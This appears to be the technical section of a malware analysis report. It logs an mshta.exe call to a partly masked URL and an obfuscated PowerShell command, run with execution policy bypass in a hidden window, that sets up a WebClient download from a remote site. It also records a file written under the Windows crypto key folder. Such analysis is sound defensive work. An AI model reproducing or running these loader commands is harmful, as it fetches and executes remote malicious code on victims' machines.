Technical Information
- '<SYSTEM32>\mshta.exe' http://po##y.site/ID-4513-214
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass -c "SV P72 'http://fo###tinfo.site/indigo/pwsc/pCVKyxxPoTiuzak';SI Variable:\1J6 'Net.WebClient';ls pena*;SV h (&(Variable *cut*t).Value.InvokeCommand.(((Variable *cut*t).Value.Inv...
- %APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\1b5161b7ceb03d93d5e8331533176fe2_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass -c "SV P72 'http://fo###tinfo.site/indigo/pwsc/pCVKyxxPoTiuzak';SI Variable:\1J6 'Net.WebClient';ls pena*;SV h (&(Variable *cut*t).Value.InvokeCommand.(((Variable *cut*t).Value.Inv...' (with hidden window)